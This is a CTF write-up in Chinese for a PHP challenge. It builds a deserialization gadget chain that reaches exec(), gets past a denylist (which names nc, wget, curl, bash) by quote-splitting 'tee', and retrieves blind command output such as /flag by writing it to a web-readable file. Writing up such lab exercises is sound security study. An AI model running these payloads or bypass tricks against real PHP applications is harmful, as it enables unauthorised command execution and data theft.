[NewStarCTF 2023 公开赛道]R!!!C!!!E!!!

这道题是反序列化+无回显RCE

关键点:tee命令

 <?php
// Echoes this script's own source, syntax-highlighted, so the challenge hands out its code.
highlight_file(__FILE__);
class minipop{
    /** Shell command text; fully attacker-controlled once the object arrives via unserialize(). */
    public $code;
    /** Echoed by __destruct(); if it holds a minipop, the echo triggers that object's __toString(). */
    public $qwejaskdjnlka;

    /**
     * Passes $code to exec() unless the denylist regex matches, then returns "alright".
     *
     * The regex is the only control between deserialized data and exec(). A
     * denylist over shell text is not a trustworthy boundary (the later
     * listings on this page get past it by splitting a word with quotes); the
     * real fix is to never hand deserialized data to exec() at all.
     */
    public function __toString()
    {
        $denylist = '/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i';
        $blocked = preg_match($denylist, $this->code);
        if (!$blocked) {
            // exec()'s return value is dropped and nothing is printed, so the
            // caller never sees command output (the "no echo" part of the writeup).
            exec($this->code);
        }
        return "alright";
    }

    /** Echoing an object here is what makes __toString() reachable from a deserialized graph. */
    public function __destruct()
    {
        echo $this->qwejaskdjnlka;
    }
}
// unserialize() on raw POST data: the client chooses which objects get built, and their
// magic methods (__destruct, __toString) then run with client-controlled properties.
// No class allowlist is applied (the allowed_classes option of unserialize()), so any
// class loaded in this script — minipop above included — can be instantiated this way.
// Review: untrusted input should be decoded with json_decode(), not unserialize().
if(isset($_POST['payload'])){
//wanna try?
unserialize($_POST['payload']);
}

源码如上,一眼就是反序列化,直接构造

<?php
class minipop{
    /** Command string carried in the serialized payload; "ls" is the first probe used in the writeup. */
    public $code="ls";
    /** Echoed by __destruct(); holding a minipop here chains into that object's __toString(). */
    public $qwejaskdjnlka;

    /**
     * Local copy of the challenge class, kept identical so serialize() produces
     * a payload the server-side class will accept.
     *
     * Runs $code through exec() when the denylist regex does not match and
     * returns "alright" either way. Note that this copy is live code: the
     * generator script's own end-of-script __destruct() will reach exec() on
     * the machine producing the payload, not only on the target.
     */
    public function __toString()
    {
        $denylist = '/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i';
        $blocked = preg_match($denylist, $this->code);
        if (!$blocked) {
            exec($this->code);
        }
        return "alright";
    }

    public function __destruct()
    {
        echo $this->qwejaskdjnlka;
    }
}
// Outer object: its __destruct() echoes $qwejaskdjnlka.
$outer = new minipop();
// Inner object: being echoed invokes its __toString(), which is where exec() sits.
$outer->qwejaskdjnlka = new minipop();
// Emit the serialized object graph to be sent as the POST payload.
// Caveat: when this script ends, $outer is destructed here too, so the inner
// object's __toString() — and therefore exec($code) — also runs locally.
echo serialize($outer);
?>

但是当我交上去的时候发现没有回应

img

一直以为是没有执行成功,后来经过大佬指点才知道是无回显。那么无回显RCE该怎么利用呢?思路是把执行结果输出到一个文件里,然后访问这个文件就可以了。

<?php
class minipop{
    /**
     * Payload from the writeup: pipe `ls /` into tee so the otherwise-discarded
     * output lands in a file named 1 under the web root; the inserted '' splits
     * the word so the literal "tee" in the denylist regex does not match.
     */
    public $code="ls /|t''ee 1";
    /** Echoed by __destruct(); holding a minipop here chains into that object's __toString(). */
    public $qwejaskdjnlka;

    /**
     * Local copy of the challenge class, kept identical so serialize() produces
     * a payload the server-side class will accept.
     *
     * Runs $code through exec() when the denylist regex does not match and
     * returns "alright" either way. This copy is live code: the generator
     * script's own end-of-script __destruct() will reach exec() on the machine
     * producing the payload as well, creating the file 1 locally.
     */
    public function __toString()
    {
        $denylist = '/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i';
        $blocked = preg_match($denylist, $this->code);
        if (!$blocked) {
            exec($this->code);
        }
        return "alright";
    }

    public function __destruct()
    {
        echo $this->qwejaskdjnlka;
    }
}
// Outer object: its __destruct() echoes $qwejaskdjnlka.
$outer = new minipop();
// Inner object: being echoed invokes its __toString(), which is where exec() sits.
$outer->qwejaskdjnlka = new minipop();
// Emit the serialized object graph to be sent as the POST payload.
// Caveat: $outer is destructed when this script ends, so the inner object's
// __toString() — and therefore exec($code) — also runs on the generating host.
echo serialize($outer);
?>

img

然后执行 `cat /flag_is_h3eeere|t''ee 1` 命令,再访问文件 1 即可直接读取flag

img